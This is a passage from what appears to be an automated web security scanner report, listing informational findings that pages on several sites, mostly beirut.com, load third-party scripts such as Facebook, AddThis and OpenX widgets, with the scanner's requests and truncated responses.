Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:24:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

21.557. http://www.barelyfitz.com/projects/tabber/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barelyfitz.com
Path:	/projects/tabber/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /projects/tabber/ HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
</table>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.558. http://www.barkerstores.com/soundings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barkerstores.com
Path:	/soundings/

Issue detail

The response dynamically includes the following script from another domain:

http://smarticon.geotrust.com/si.js

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...
<td height="28" align="middle" width="147">
                       <script language="JavaScript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
...[SNIP]...

21.559. http://www.beirut.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET / HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:49:26 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=ael7hgofe5550n3tan4s3cqg47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.560. http://www.beirut.com/Beauty/Cellulite-Reduction/789814461 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Beauty/Cellulite-Reduction/789814461

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Cellulite-Reduction/789814461 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.561. http://www.beirut.com/Beauty/Facial-Treatment/70794784 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Beauty/Facial-Treatment/70794784

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Facial-Treatment/70794784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.562. http://www.beirut.com/Beauty/Hair-Removal-Clinics/108766177 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Beauty/Hair-Removal-Clinics/108766177

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Hair-Removal-Clinics/108766177 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.563. http://www.beirut.com/Beauty/Hair-Salons/220615163 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Beauty/Hair-Salons/220615163

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Hair-Salons/220615163 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:53:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.564. http://www.beirut.com/Beauty/Makeup-Salons/6608017665 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Beauty/Makeup-Salons/6608017665

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Makeup-Salons/6608017665 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:54:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.565. http://www.beirut.com/Beauty/Massage-Parlors/9361709237 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Beauty/Massage-Parlors/9361709237

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Massage-Parlors/9361709237 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:56:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.566. http://www.beirut.com/Beauty/Nail-Salons/7238617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Beauty/Nail-Salons/7238617

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Beauty/Nail-Salons/7238617 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:01:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.567. http://www.beirut.com/Financial/Banks/579756203 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Financial/Banks/579756203

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Financial/Banks/579756203 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.568. http://www.beirut.com/Financial/Money-Transfer/348928994 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Financial/Money-Transfer/348928994

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Financial/Money-Transfer/348928994 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:39:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.569. http://www.beirut.com/Galleries/13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Galleries/13

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Galleries/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:29:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.570. http://www.beirut.com/Hotels/2-Stars/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/2-Stars/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/2-Stars/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
